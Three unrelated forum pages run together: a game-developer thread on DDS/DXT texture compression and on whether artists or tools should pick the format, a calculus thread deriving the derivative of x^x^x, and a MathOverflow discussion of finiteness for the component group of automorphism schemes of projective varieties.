Not entirely correct. Texture fetch latency and caching behaviour will be (slightly) affected, and due to more mipmap levels you'll inevitably increase memory usage (assuming DXT5).
How so? If the compressed, but larger resolution texture is the same size in memory as an uncompressed, smaller version. Also, I don't think it'll increase memory usage even counting the mip map levels (compared with an uncompressed but smaller texture + its mip maps). Or if it does, it's like 4 bytes for the one extra level :)
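For what it's worth, the arithmetic checks out: DXT5 stores each 4x4 block in 16 bytes (1 byte per pixel), so a 1024x1024 DXT5 texture and an uncompressed 512x512 RGBA8 texture both take 1 MB at the base level, and their full mip chains differ by only a handful of bytes. A quick sketch (helper names are mine):

```python
def dxt_mip_chain_bytes(w, h, block_bytes):
    """Bytes for a full mip chain of a 4x4-block-compressed texture."""
    total = 0
    while True:
        total += max(1, (w + 3) // 4) * max(1, (h + 3) // 4) * block_bytes
        if w == 1 and h == 1:
            return total
        w, h = max(1, w // 2), max(1, h // 2)

def raw_mip_chain_bytes(w, h, bytes_per_pixel):
    """Bytes for a full mip chain of an uncompressed texture."""
    total = 0
    while True:
        total += w * h * bytes_per_pixel
        if w == 1 and h == 1:
            return total
        w, h = max(1, w // 2), max(1, h // 2)

dxt5 = dxt_mip_chain_bytes(1024, 1024, 16)  # DXT5: 16 bytes per 4x4 block
rgba = raw_mip_chain_bytes(512, 512, 4)     # RGBA8: 4 bytes per pixel
print(dxt5, rgba, dxt5 - rgba)
```

The small gap comes from the tail of the chain, where mip levels below 4x4 still pay for one full compressed block.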
Quote:
However, this was not my point. When you design your game and all artwork assets, you define a common lowest denominator for it to work on. Say you target 512MB VRAM class hardware. You will choose your resolutions and compression settings so to avoid (too much) swapping on such a card. Now, imagine some user buying a new 1GB VRAM card. Essentially, since your game was designed with 512MB in mind, half of his memory will be unused and the textures will look the same as on a 512MB card. Mr.NewCardOwner will not be happy.
In your scenario you're doing exactly what I'm saying. You're essentially designing your game with imaginary future tech cards in mind, with large texture sizes, and allowing current lowest denominator cards to run by compressing the textures.
Quote:
Quote:
Probably the optimal version would let the artists specify an optional compression format in an options file for every texture.
I wouldn't trust an average artist to handle that [wink]
Really? Is it that you're afraid the artists won't ever choose the compression because they don't want their art to have artifacts?
Quote:
If you think like that, then why not consider JPEG instead ? It's going to be smaller, after all. Of course there's the JPEG->DXTC transcoding, which would suck. But seriously, while the texture loading is HDD limited, it only makes a small percentage of the overall loading time of a scene.
What else are you doing in your scene? The time it takes to dump stuff (textures, models, etc.) from disk to GPU should be the bottleneck. If other stuff is slowing your loading times down, I can't help but feel you're doing something wrong. I can't imagine anything CPU intensive that should be going on during level load (except things like uncompressing from disk to make up for poor hard drive speeds). And probably random properties I guess. If you have 1000 monsters that start with random positions, that might take a while. But most games aren't like that.
Quote:
I just can't understand how people can store their assets in a format that was never meant to be a lossy image storage format. It was designed as a compression with a GPU-friendly decoding process. It is good at doing this for now, but why use it for something where other, better alternatives exist ?
If you're storing textures on disk, you probably want to avoid JPG because it's the worst of both worlds: artifacts and uncompressed in VRAM (or worse, you're DXT compressing the JPG, adding artifacts to artifacts). That leaves lossless, where PNG is king. Or hardware accelerated lossy, where DDS makes the most sense, since it natively supports it. Or roll your own, of course, that could support either.
If/when they invent hardware accelerated JPG and PNG compression, I will totally jump on that bandwagon. But I would still probably be using a DDS format: Microsoft would probably invent some new DDS mode that lets you store as JPG or PNG compression to keep DDS current. Compression aside, DDS is the best general purpose texture format, because it's the only one specifically developed with game hardware in mind.
##### Share on other sites
Yann L 1802
Quote:
Original post by Numsgil
How so? If the compressed, but larger resolution texture is the same size in memory as an uncompressed, smaller version. Also, I don't think it'll increase memory usage even counting the mip map levels (compared with an uncompressed but smaller texture + its mip maps). Or if it does, it's like 4 bytes for the one extra level :)
Sure, the difference is small - but saying that it is the same would be incorrect. Nitpicking, I admit ;) However, the increase of memory footprint on the cache is very much noticeable, since texture cache usually operates on decoded values.
Quote:
Original post by Numsgil
In your scenario you're doing exactly what I'm saying. You're essentially designing your game with imaginary future tech cards in mind, with large texture sizes, and allowing current lowest denominator cards to run by compressing the textures.
So ? Set aside that such cards aren't imaginary (but haven't yet reached the required market penetration for the target audience), my approach can seamlessly improve texture quality on such cards. Yours cannot without shipping a new texture pack.
Quote:
Really? Is it that you're afraid the artists won't ever choose the compression because they don't want their art to have artifacts?
Amongst others, that is a factor. Another one is that artists may not understand all technical implications of such a choice. We usually try to limit the options of our artists to 'art thingies' only.
Quote:
What else are you doing in your scene? The time it takes to dump stuff (textures, models, etc.) from disk to GPU should be the bottleneck. If other stuff is slowing your loading times down, I can't help but feel you're doing something wrong.
Lol, no, I don't think so ;)
Quote:
I can't imagine anything CPU intensive that should be going on during level load (except things like uncompressing from disk to make up for poor hard drive speeds).
Let's see - transcoding PRT coefficient maps for partially-dynamic global illumination, generating and compiling metashaders, tracing horizon maps, setting up dynamic partitioning systems, uncompressing progressive LOD data, preparing energy transfer volumes for dynamic soft shadows, generating seed and permutation tables for fractal vegetation and clouds, and so on. All this is dependent on the hardware the engine is being run on, in order to smoothly adjust the delicate performance-quality balance to match the players/users hardware and preferences. There's a lot more to a modern 3D engine than 'dumping stuff from disk to GPU'. Now granted, what we do is very high end stuff, and it's not for a game. But most of these techniques also apply to advanced game 3D engines.
Quote:
If/when they invent hardware accelerated JPG and PNG compression, I will totally jump on that bandwagon. But I would still probably be using a DDS format: Microsoft would probably invent some new DDS mode that lets you store as JPG or PNG compression to keep DDS current. Compression aside, DDS is the best general purpose texture format, because it's the only one specifically developed with game hardware in mind.
Let's not slip into religious fanboi-isms, and stay with the facts, shall we ? DDS is definitely not the best general purpose format. DDS isn't even a general purpose format. It is a quite specific format, that suits a certain type of situation, for certain people. Take console development, for example. Using precompressed DDS on XBox makes perfect sense, because your target hardware will never change.
There's nothing wrong with using DDS - but make sure you understand the implications of doing so, that you understand the available alternatives, and that after careful consideration, you have opted that using DDS is in fact the best solution in your situation.
But advocating it as a generalized 'best format', just because you happen to be familiar with it, without taking into account the specific context of usage, is very naive and misleading.
##### Share on other sites
Kest 547
Quote:
Original post by Hodgman
Quote:
Original post by Kest
Quote:
Also, while PNG might well be compressed it is only compressed on disk; DXT compressed images remain compressed in texture ram
Any format can be compressed once its in system ram.
IIRC, DirectX actually has the ability to load a PNG and save it as DDS, or vice versa. Once the texture is in ram, all format bets are off.
^^fixed to show apples and oranges ;)
You didn't fix my statement, you modified it. I was referring to texture ram. Once the texture is in video ram, it no longer matters how it was stored on the disk. When, where, and how it gets processed from disk to v-ram doesn't change any of the facts.
##### Share on other sites
frob 44919
Quote:
Original post by Numsgil
Quote:
Really? Is it that you're afraid the artists won't ever choose the compression because they don't want their art to have artifacts?
Amongst others, that is a factor. Another one is that artists may not understand all technical implications of such a choice. We usually try to limit the options of our artists to 'art thingies' only.
Ditto on that.
Sure, artists are able to pick the best format, it isn't that they will lack the skill if you give them the proper training. Some of them will understand the importance of picking the most appropriate format for the technical rather than artistic reasons, even if it reduces the artistic quality or image fidelity from the originals.
But the real problem is consistency.
They're dealing with many hundreds, even potentially several tens of thousands of graphics files over the course of the project. They're working with these files all day, every work day.
Do you honestly expect them to evaluate each file and determine the best format whenever they save their work? Every time they modify a file?
I don't. I expect a tool to do this when it builds and packages all the art assets. Automating this task saves between hundreds and thousands of hours over the course of the project, depending on the number of artists. It simplifies their workflow, and it also gives better results for the game. Everybody wins.
In fact, we do have tools for this. The tool converts it into all the possible formats, evaluates them based on the resulting image and the data size, and picks the best one based on those results. The art programmers, technical artists, and other qualified people determine the heuristics for evaluating what is the best, allowing us to trade off size, speed, and most importantly image fidelity without sacrificing technical quality.
##### Share on other sites
Numsgil 501
Quote:
Original post by Yann L
Quote:
If/when they invent hardware accelerated JPG and PNG compression, I will totally jump on that bandwagon. But I would still probably be using a DDS format: Microsoft would probably invent some new DDS mode that lets you store as JPG or PNG compression to keep DDS current. Compression aside, DDS is the best general purpose texture format, because it's the only one specifically developed with game hardware in mind.
Let's not slip into religious fanboi-isms, and stay with the facts, shall we ? DDS is definitely not the best general purpose format. DDS isn't even a general purpose format. It is a quite specific format, that suits a certain type of situation, for certain people. Take console development, for example. Using precompressed DDS on XBox makes perfect sense, because your target hardware will never change.
There's nothing wrong with using DDS - but make sure you understand the implications of doing so, that you understand the available alternatives, and that after careful consideration, you have opted that using DDS is in fact the best solution in your situation.
But advocating it as a generalized 'best format', just because you happen to be familiar with it, without taking into account the specific context of usage, is very naive and misleading.
Best for game development I meant :) And not counting whatever you make yourself, of course. And compression aside (yes, that's a rather large aside). Other than compression there's nothing that PNG or TGA or JPG get you above what DDS gets you, while DDS gets you some things beyond PNG et al. Like native support for cubemaps. Sure you could just do a cross in a PNG, but why would you when DDS can natively support it? You know, besides that whole compression thing.
Unless I'm missing something?
##### Share on other sites
Numsgil 501
Quote:
Original post by frob
Quote:
Original post by Numsgil
Quote:
Really? Is it that you're afraid the artists won't ever choose the compression because they don't want their art to have artifacts?
Amongst others, that is a factor. Another one is that artists may not understand all technical implications of such a choice. We usually try to limit the options of our artists to 'art thingies' only.
Ditto on that.
Sure, artists are able to pick the best format, it isn't that they will lack the skill if you give them the proper training. Some of them will understand the importance of picking the most appropriate format for the technical rather than artistic reasons, even if it reduces the artistic quality or image fidelity from the originals.
But the real problem is consistency.
They're dealing with many hundreds, even potentially several tens of thousands of graphics files over the course of the project. They're working with these files all day, every work day.
Do you honestly expect them to evaluate each file and determine the best format whenever they save their work? Every time they modify a file?
I don't. I expect a tool to do this when it builds and packages all the art assets. Automatic this task saves between hundreds and thousands of hours over the course of the project, depending on the number of artists. It simplifies their workflow, and it also gives better results for the game. Everybody wins.
In fact, we do have tools for this. The tool converts it into all the possible formats, evaluates them based on the resulting image and the data size, and picks the best one based on those results. The art programmers, technical artists, and other qualified people determine the heuristics for evaluating what is the best, allowing us to trade off size, speed, and most importantly image fidelity without sacrificing technical quality.
I know this is something of a pipe dream, but seriously, artists should understand the technical implications of their work! This hand holding and coddling for artists that seems to be prevalent makes my stomach turn. At the very least an artist should have a basic grounding in calculus and linear algebra. They should understand the lighting model. They should be able to write their own shaders. They should understand and make decisions about how to use the hardware of video cards. I'm guessing this isn't the way things are simply because there aren't enough artists that can do that, and simple demand and lack of supply is driving the standards.
In a perfect world, I as a programmer would give a max budget to my art team. Do not exceed 160 MB. They would build their level with a mind towards that limit. If there's a far away billboard, they can save MBs by saving it as a DXT1. If there's some grass off in the distance, they might need an alpha channel and opt for DXT3 or 5. If there's a baddy that will be right in front of the player, they can go for a full 32 bits. Something in game counts the total MBs of all assets and gives it as a readback when the artists run the game. The art lead cracks down when some junior artist uses a 1024x1024 32 bit texture for a postage stamp. If render times are too high, they'd load up PerfHud and take a look at the draw commands.
I know that's not reality. I don't know if it's even achievable. Perhaps we should just be thankful when an artist makes something look good, and leave all the technical implications to the programmers.
##### Share on other sites
Zipster 2359
Quote:
Original post by Numsgil
I know this is something of a pipe dream, but seriously, artists should understand the technical implications of their work! This hand holding and coddling for artists that seems to be prevalent makes my stomach turn. At the very least an artist should have a basic grounding in calculus and linear algebra. They should understand the lighting model. They should be able to write their own shaders. They should understand and make decisions about how to use the hardware of video cards. I'm guessing this isn't the way things are simply because there aren't enough artists that can do that, and simple demand and lack of supply is driving the standards.
Calculus and linear algebra? Pipe dream indeed ;) But seriously, what you're talking about sounds a lot like a technical artist, and there are plenty of those out there if you know where to look. We just hired one a few weeks ago. They're basically programmers who also have a good understanding of the art side of development as and can use Max, Photoshop, write scripts, shaders, etc. I don't know if I'd trust a full-blown artist to write shaders though. Shaders can truly be time-critical code if you're GPU-bound, and in my experience artists will use every single feature they possibly can to achieve a better visual effect unless you pull back on the reins a bit. We have a running joke in the graphics department whenever we add a new feature, "don't tell the artists!" :P
##### Share on other sites
Kest 547
Logic versus ingenuity. You can favor both equally, be naturally pulled toward one and annoyed with the other, or somewhere in between. To get the best of both worlds, you need at least two people. Or a split personality.
##### Share on other sites
Numsgil 501
Quote:
Original post by Zipster
Quote:
Original post by Numsgil
I know this is something of a pipe dream, but seriously, artists should understand the technical implications of their work! This hand holding and coddling for artists that seems to be prevalent makes my stomach turn. At the very least an artist should have a basic grounding in calculus and linear algebra. They should understand the lighting model. They should be able to write their own shaders. They should understand and make decisions about how to use the hardware of video cards. I'm guessing this isn't the way things are simply because there aren't enough artists that can do that, and simple demand and lack of supply is driving the standards.
Calculus and linear algebra? Pipe dream indeed ;) But seriously, what you're talking about sounds a lot like a technical artist, and there are plenty of those out there if you know where to look. We just hired one a few weeks ago. They're basically programmers who also have a good understanding of the art side of development as and can use Max, Photoshop, write scripts, shaders, etc. I don't know if I'd trust a full-blown artist to write shaders though. Shaders can truly be time-critical code if you're GPU-bound, and in my experience artists will use every single feature they possibly can to achieve a better visual effect unless you pull back on the reins a bit. We have a running joke in the graphics department whenever we add a new feature, "don't tell the artists!" :P
Ha, thanks, that was a good buzz word to search for. Yes I think that's what I'm talking about. Let's just train up a small army of technical artists and leave the regular variety to concept art :D
##### Share on other sites
emeyex 382
Quote:
Original post by Numsgil
...At the very least an artist should have a basic grounding in calculus and linear algebra...
That's the best line I've heard all year! The funniest part is that you said "at the very least". But seriously, if you do hear that Leonardo da Vinci is looking for a job, let me know, I'd love to hire him :)
##### Share on other sites
Numsgil 501
Quote:
Original post by emeyex
Quote:
Original post by Numsgil
...At the very least an artist should have a basic grounding in calculus and linear algebra...
That's the best line I've heard all year! The funniest part is that you said "at the very least". But seriously, if you do hear that Leonardo da Vinci is looking for a job, let me know, I'd love to hire him :)
Yeah, I guess I have high expectations :) I guess that amounts to saying that every game artist should have minored in math.
##### Share on other sites
emeyex 382
Quote:
Original post by Numsgil
Yeah, I guess I have high expectations :) I guess that amounts to saying that every game artist should have minored in math.
Nothing wrong with high expectations, I agree that it would be nice! I just wouldn't go designing your pipeline around those expectations :)
##### Share on other sites
Numsgil 501
Quote:
Original post by emeyex
Quote:
Original post by Numsgil
Yeah, I guess I have high expectations :) I guess that amounts to saying that every game artist should have minored in math.
Nothing wrong with high expectations, I agree that it would be nice! I just wouldn't go designing your pipeline around those expectations :)
Probably not. I'm still learning to lower my expectations. I still think choosing a DXT compression level is something an artist can handle, though. There really aren't that many choices: none, DXT1, DXT3, DXT5. That and a texture budget should mean they make the right choice.
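The choice is small enough to mechanize, too. A toy picker encoding the usual rules of thumb (predicate names are mine; a production tool would also weigh size budgets and measured quality loss):

```python
def pick_texture_format(has_alpha, alpha_is_sharp_mask, quality_critical):
    """Rule-of-thumb choice among the four options above."""
    if quality_critical:
        return "none"  # leave it full 32-bit
    if not has_alpha:
        return "DXT1"  # 4 bpp, opaque (or 1-bit alpha)
    if alpha_is_sharp_mask:
        return "DXT3"  # explicit alpha, hard cutouts
    return "DXT5"      # interpolated alpha, smooth gradients

print(pick_texture_format(False, False, False))  # distant billboard
print(pick_texture_format(True, True, False))    # grass cutout
print(pick_texture_format(True, False, True))    # close-up character
```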
##### Share on other sites
frob 44919
Quote:
Original post by Numsgil
Quote:
Original post by emeyex
Quote:
Original post by Numsgil
Yeah, I guess I have high expectations :) I guess that amounts to saying that every game artist should have minored in math.
Nothing wrong with high expectations, I agree that it would be nice! I just wouldn't go designing your pipeline around those expectations :)
Probably not. I'm still learning to lower my expectations. I still think choosing a DXT compression level is something an artist can handle, though. There really aren't that many choices: none, DXT1, DXT3, DXT5. That and a texture budget should mean they make the right choice.
Something they *can* choose? Sure. Any artist could be taught that fairly easily.
Something they *should* choose, every single time they export the art? That's a job for a tool.
##### Share on other sites
Numsgil 501
Quote:
Original post by frob
Quote:
Original post by Numsgil
Quote:
Original post by emeyex
Quote:
Original post by Numsgil
Yeah, I guess I have high expectations :) I guess that amounts to saying that every game artist should have minored in math.
Nothing wrong with high expectations, I agree that it would be nice! I just wouldn't go designing your pipeline around those expectations :)
Probably not. I'm still learning to lower my expectations. I still think choosing a DXT compression level is something an artist can handle, though. There really aren't that many choices: none, DXT1, DXT3, DXT5. That and a texture budget should mean they make the right choice.
Something they *can* choose? Sure. Any artist could be taught that fairly easily.
Something they *should* choose, every single time they export the art? That's a job for a tool.
But how will the tool know what to compress and what to leave in full 32 bits?
##### Share on other sites
swiftcoder 18432
Quote:
Original post by Numsgil
Quote:
Original post by frob
Something they *should* choose, every single time they export the art? That's a job for a tool.
But how will the tool know what to compress and what to leave in full 32 bits?
Heuristics, based on the compression savings, texture budgets, and quality loss (an estimation of which can be calculated by analysing the image).
##### Share on other sites
Numsgil 501
Quote:
Original post by swiftcoder
Quote:
Original post by Numsgil
Quote:
Original post by frob
Something they *should* choose, every single time they export the art? That's a job for a tool.
But how will the tool know what to compress and what to leave in full 32 bits?
Heuristics, based on the compression savings, texture budgets, and quality loss (an estimation of which can be calculated by analysing the image).
Well, it's a fixed compression ratio, so I guess that means the heuristic would just ignore textures under some fixed size. How do you develop a quality loss estimation algorithm? The naive implementation I can think of, basically just comparing pixels and recording the difference, isn't all that effective.
##### Share on other sites
Daaark 3553
Quote:
Original post by Numsgil
The naive implementation I can think of, basically just comparing pixels and recording the difference, isn't all that effective.
Color, brightness, saturation, contrast. There is also edge erosion which is even visible with JPEGs saved at 100%.
##### Share on other sites
Yann L 1802
An FFT can help a lot when comparing image quality by analysing the frequency domain. This can help to estimate the amount of quantization error, blurriness, and high frequency artifacts. Converting to alternative colourspaces, especially those separating chromaticity from brightness (YUV or Yxy, for example), can help detect subtle local colour shifts such as those common with DXTC. Combined with psychovisual profiles, such a quality estimation can be much more accurate than the subjective guess from a human.
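As a crude baseline for the kind of metric Yann describes, one can at least separate brightness from chromaticity and score the error in the luma channel as a PSNR; real psychovisual metrics go much further. A hedged sketch (BT.601 luma weights; the pixel data is made up):

```python
import math

def luma(rgb):
    """BT.601 luma: separates brightness from chromaticity."""
    r, g, b = rgb
    return 0.299 * r + 0.587 * g + 0.114 * b

def luma_psnr(original, compressed, peak=255.0):
    """PSNR over the luma channel of two equal-length RGB pixel lists."""
    mse = sum((luma(a) - luma(b)) ** 2
              for a, b in zip(original, compressed)) / len(original)
    if mse == 0:
        return float("inf")
    return 10.0 * math.log10(peak * peak / mse)

# Toy 4-pixel "images": the second has slight colour shifts like DXTC introduces.
orig = [(200, 120, 40), (60, 60, 60), (255, 0, 0), (10, 200, 90)]
comp = [(198, 122, 40), (62, 58, 61), (250, 4, 2), (12, 198, 92)]
print(round(luma_psnr(orig, comp), 1))
```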
##### Share on other sites
Numsgil 501
Hmm, interesting. Are there any utilities floating around the intraweb that do this (that is, plug in a texture in PNG or something and a desired compression, and get back some sort of score for quality)? Or is this the sort of thing that everyone rolls their own for?
##### Share on other sites
swiftcoder 18432
Quote:
Original post by Numsgil
Hmm, interesting. Are there any utilities floating around the intraweb that do this (that is, plug in a texture in PNG or something and a desired compression, and get back some sort of score for quality)? Or is this the sort of thing that everyone rolls their own for?
There is an astounding body of research on the subject, but actual tools seem in short supply. The only one I am aware of is for video.
##### Share on other sites
frob 44919
Quote:
Original post by swiftcoder
Quote:
Original post by Numsgil
Hmm, interesting. Are there any utilities floating around the intraweb that do this (that is, plug in a texture in PNG or something and a desired compression, and get back some sort of score for quality)? Or is this the sort of thing that everyone rolls their own for?
There is an astounding body of research on the subject, but actual tools seem in short supply.
A few high-end numeric algorithms libraries, many computer vision libraries, and most commercial image processing toolkits all include image fidelity computations.
I don't know of any that are free, but I know of an in-house version that works well for us. A quick Google search shows quite a few commercial libraries, and looking at a few shows them around $500 per license, or "call for details" pricing. If you are interested in doing this, finding a professional computer vision or image processing library shouldn't be too hard.
Even if you do use some of the computer vision or image processing libraries, image fidelity metrics are not a single number, nor are they generic "plug in your image files and get a magical number" systems. They require actual work on your own tool using your own knowledge of what heuristics to use and how to intelligently compare the fidelity metrics.
##### Share on other sites
Numsgil 501
Quote:
Original post by frob
I don't know of any that are free, but I know of an in-house version that works well for us. A quick Google search shows quite a few commercial libraries, and looking at a few shows them around $500 per license, or "call for details" pricing. If you are interested in doing this, finding a professional computer vision or image processing library shouldn't be too hard. Even if you do use some of the computer vision or image processing libraries, image fidelity metrics are not a single number, nor are they generic "plug in your image files and get a magical number" systems. They require actual work on your own tool using your own knowledge of what heuristics to use and how to intelligently compare the fidelity metrics.
Right now our artists export images from photoshop using a free DDS plugin from NVidia, choosing what format to use (DXT1, 3, 5 or uncompressed mostly). If there was a way to have a tool decide intelligently when to compress and when not to, that'd free up some work for our artists. Which would be a good thing. Not something I think we'd want to spend a lot of money on, though.
But, back to this whole coddling artist issue, at some point it would need to come down to a magic number. And they'd still have to be able to add information like "this is far away, so quality doesn't matter" and "this is close up so quality matters" and "this is a cutout where the alpha is very important", etc. So if there is a pre-existing tool that aided the artists in choosing a format (or even was smart enough to really decide entirely by itself), I'd give it a spin. Not something I'm going to want to make myself though.
##### Share on other sites
Yann L 1802
Quote:
Original post by Numsgil
I'd also like to point out that when people say things like "don't let your artists decide, make the tools decide automatically", well, if your tools just make everything a DXT5 because more complex analysis costs $500 plus a month of programmer labor, how's that better?
Well, you just invest the $500 and the man hours to get it up and running. This is a one-time cost. The time you'll lose with artists deciding (and correcting potential errors later due to incorrect decisions) is a recurring cost. And if we're talking about a commercial game title here, then $500 for a license is pocket change.
##### Share on other sites
Numsgil 501
Quote:
Original post by Yann L
Well, you just invest the $500 and the man hours to get it up and running. This is a one-time cost. The time you'll lose with artists deciding (and correcting potential errors later due to incorrect decisions) is a recurring cost. And if we're talking about a commercial game title here, then $500 for a license is pocket change.
I was thinking more the one programmer man month spent tweaking the heuristic. That's closer to several thousand dollars in time. For an artist, choosing which compression to use is as simple as choosing an item from a drop down box. That's an extra 5 seconds. The item chosen will be remembered for the next round of saving, so let's say something on the order of 20 seconds per texture over the project lifetime. Assuming something on the order of 2000 textures, you're talking maybe 12 hours of work over the lifetime of the project. Even adding in extra time for things like an artist figuring out that normal maps can't be DXT, it just doesn't add up as cost effective.
If there was an existing tool, I'd use it. But I can't see anyone justifying the expense of building such a tool compared with just having an artist save the file as a DDS and load it up in something like DX Texture Tool when they have problems. | 2017-08-23 12:07:58
https://www.physicsforums.com/threads/derviate-x-x-x.193310/ | Derviate x^x^x
1. Oct 23, 2007
erjkism
1. The problem statement, all variables and given/known data
differentiate f(x)= x^x^x
2. Relevant equations
chain rule
product rule
3. The attempt at a solution
x^x (ln x)
I don't know what to do after this.
2. Oct 23, 2007
quasar987
A function raised to another function is an exponential:
In general, $$f(x)^{g(x)} = \exp(\ln(f(x)^{g(x)}))=\exp(g(x)\ln(f(x)))$$
And you know how to differentiate an exponential.
So, can you use what I wrote to write x^x^x as an exponential?
3. Oct 23, 2007
arildno
Would that be:
1. $$x^{(x^{x})}=x^{x^{x}}$$
2. $$(x^{x})^{x}=x^{x^{2}}$$
Learn to use parentheses..
4. Oct 24, 2007
HallsofIvy
Staff Emeritus
Don't just leave x^x(ln x) by itself! If f= x^x^x, then ln(f)= x^x ln(x). Now DO IT AGAIN! ln(ln(f))= ln(x^x ln(x))= ln(x^x)+ ln(ln(x))= xln(x)+ ln(ln(x)).
Use the chain rule to differentiate both ln(ln(f(x))) and ln(ln(x)).
5. Oct 25, 2007
Gib Z
I sometimes get annoyed with exponential notation for exactly that reason. My opinion is that if the exponent is any larger than one term, write it in terms of exp(...).
6. Oct 26, 2007
nizi
Neglecting the given attempt, I put
$$y = x^{x^{x}}$$
$$z = x^{x}$$
and develop as follows.
$$\ln y = \ln x^{x^{x}} = z \ln x$$
$$\frac{y'}{y} = z' \ln x + z \frac{1}{x}$$
here I calculate the differentiation of $$z$$
$$z = x^{x}$$
$$\ln z = x \ln x$$
$$\frac{z'}{z} = \ln x + x \frac{1}{x}$$
$$z' = z \left( { \ln x + 1 } \right) = x^{x} \left( { \ln x + 1 } \right)$$
Accordingly
$$y' = y \left( { x^{x} \left( { \ln x + 1 } \right) \ln x + x^{x} \frac{1}{x} } \right) = x^{x^{x}+x-1} \left( { x \left( { \ln x + 1 } \right) \ln x + 1 } \right)$$
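The closed form above is easy to sanity-check numerically. A minimal sketch (the test point 1.7 and step size are arbitrary choices of mine) comparing it against a central finite difference:

```python
import math

def f(x):
    # y = x^(x^x)
    return x ** (x ** x)

def f_prime(x):
    # closed form derived in the thread:
    # y' = x^(x^x + x - 1) * ( x*(ln x + 1)*ln x + 1 )
    return x ** (x ** x + x - 1) * (x * (math.log(x) + 1) * math.log(x) + 1)

x0 = 1.7
h = 1e-6
numeric = (f(x0 + h) - f(x0 - h)) / (2 * h)  # central difference approximation
print(numeric, f_prime(x0))
```

The two values agree to many digits, which supports the derivation; note also that at x = 1 the formula gives exactly 1.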
http://mathoverflow.net/questions/22211/finiteness-property-of-automorphism-scheme/22596 | # Finiteness property of automorphism scheme
Some time ago I mentioned a certain open question in an MO answer, and Pete Clark suggested posting the question on its own. OK, so here it is:
First, the setup. Let $X$ be a projective scheme over a field $k$. By Grothendieck, there is a locally finite type $k$-scheme $A = {\rm{Aut}}_ {X/k}$ representing the functor assigning to any $k$-scheme $T$ the group of $T$-automorphisms of $X_T$. (Artin proved a related result with projectivity relaxed to properness, even allowing $X$ to be an algebraic space.) The construction uses Hilbert schemes, so at most countably many geometric connected components can occur.
In some cases the automorphism scheme is connected (such as for projective space, when the automorphism scheme is ${\rm{PGL}}_n$), and in other cases the geometric component group $\pi_0(A) = (A/A^0)(\overline{k})$ can be infinite. For the latter, a nice example is $X = E \times E$ for an elliptic curve $E$ without complex multiplication over $\overline{k}$; in this case $A$ is an extension of ${\rm{GL}}_ 2(\mathbf{Z})$ by $E \times E$, so $\pi_0(A) = {\rm{GL}}_ 2(\mathbf{Z})$. This latter group is finitely presented.
Question: is the geometric component group $\pi_0(A)$ of the automorphism scheme $A$ of a projective $k$-scheme $X$ always finitely generated? Finitely presented? And with projectivity relaxed to properness, and "scheme" relaxed to "algebraic space"?
Feel free to assume $X$ is smooth and $k = \mathbf{C}$, since I believe that even this case is completely wide open.
Remark: Let me mention one reason one might care (apart from the innate appeal, say out of analogy with finite generation of Neron-Severi groups in the general proper case). If trying to study finiteness questions for $k$-forms of $X$ (say for fppf topology, which amounts to projective $k$-schemes $X'$ so that $X'_K = X_K$ for a finite extension $K/k$), then the language of ${\rm{H}}^1(k, {\rm{Aut}}_{X/k})$ is convenient. To get hands on that, the Galois cohomology of the geometric component group intervenes. So it is useful to know if that group is finitely generated, or even finitely presented.
Fix an ample class $L$ in Neron-Severi group of $X$. The subgroup of automorphisms sending $L$ to itself is of finite type. So the real question is: what is the image of $Aut(X)$ in $Aut(NS(X))$? Is that finitely generated/presented? These automorphisms permute ample classes, so if the semigroup of ample classes is f.g. (which happens rarely), we are OK. – VA. Apr 22 '10 at 17:40
For minimal surfaces a result of Dolgachev says that (possibly over the complex numbers only) that the image of $\mathrm{Aut}(X)$ in $\mathrm{Aut}(K_X^\perp)$ (the orthogonal complement of the canonical class) is a quotient of a subgroup of finite index of the full automorphism group of that lattice. Hence it is at least finitely generated. The normal subgroup by which one takes the quotient is the subgroup generated by reflections in nodal curves. – Torsten Ekedahl Apr 22 '10 at 17:53
Right. One can look at other features of NS(X) that are preserved. For example for Fanos, the closure of the ample cone is finitely generated, so that leads to the proof. CYs seem like maybe the hardest case. Such a natural question... Must be known, I hope someone answers. – VA. Apr 22 '10 at 21:32
VA, Mumford gave a colloq. talk here today, and after the dinner I mentioned the question. He was intrigued, and said he'd never heard anything about a result in that direction. Mazur wrote a paper with some theoretical arguments for Tate-Shaf. sets which required finite presentation hypotheses on Aut-scheme. In that part he acknowledged assistance from Gabber, to the extent of saying that for some result Gabber weakened the hypothesis to finite generation...but not eliminated it! So seems Gabber thought about it without success. If it is known, I will then be amazed (and very happy). – BCnrd Apr 23 '10 at 3:53
"Mazur wrote a paper ... " On the passage from local to global in number theory. Bull. Amer. Math. Soc. (N.S.) 29 (1993), no. 1, 14--50. – Chandan Singh Dalawat Apr 23 '10 at 5:15
Let us first consider the case of a minimal surface $X$ (by minimal I mean $K_X$ nef). Dolgachev (Dolgachev: Reflection groups in algebraic geometry is a good reference even though the proof is only referenced there not given) gave a kind of structure theorem for the image $A_X$ of $\mathrm{Aut}(X)$ in $\mathrm{Aut}(S_X)$, where $S_X$ is the orthogonal complement of $K_X$ in $\mathrm{NS}(X)$ modulo torsion. His result says that there is a normal subgroup $W_X$ of $\mathrm{Aut}(S_X)$ generated by reflections in $-2$-curves and the group $P_X$ generated by $A_X$ and $W_X$ is a semi-direct product and of finite index in $\mathrm{Aut}(S_X)$. Note that it is possible to have $W_X=\{e\}$ and then $A_X$ itself is of finite index and hence an arithmetic (and thus finitely presented). It is also possible to have $W_X$ of finite index and then $A_X$ is finite (and thus finitely presented). However, there are intermediate cases where both $A_X$ and $W_X$ are infinite. Still $A_X$ is a quotient of $P_X$ and hence is finitely generated. I do not know if it is always finitely presented. Borcherds (Coxeter groups, Lorentzian lattices, and $K3$ surfaces. Internat. Math. Res. Notices 1998) gives examples where it is (and where it is even nicer) but also examples where it is finitely generated but not arithmetic.
I now realise that finite presentation is always true: For that we only need to show that $W_X$ is normally generated in $\mathrm{Aut}(X)$ by a finite number of elements and for that it is enough to show the same thing for $\mathrm{Aut}(S_X)$. We know that $W_X$ is generated by reflections in $-2$-elements. There are however only a finite number of conjugacy classes of $-2$-elements. For this it is, by standard lattice theoretic arguments, enough to prove that there are only a finite number of isomorphism classes of orthogonal complements. However, the discriminant of such a complement is bounded in terms of the rank and discriminant of $S_X$ and there are only a finite number of forms of bounded rank and discriminant.
A further step would be to blow up points of $X$ (still assumed minimal). As $X$ is the unique minimal model any automorphism of the blowing up is given by an automorphism of $X$ that permutes the blown up points (and the subgroup fixing the points is commensurable with the full automorphism group). In the case of abelian or hyperelliptic surfaces blowing up just one point is pointless as it just serves to kill off the connected component of $\mathrm{Aut}(X)$ so in that case the first interesting case is blowing up two points.
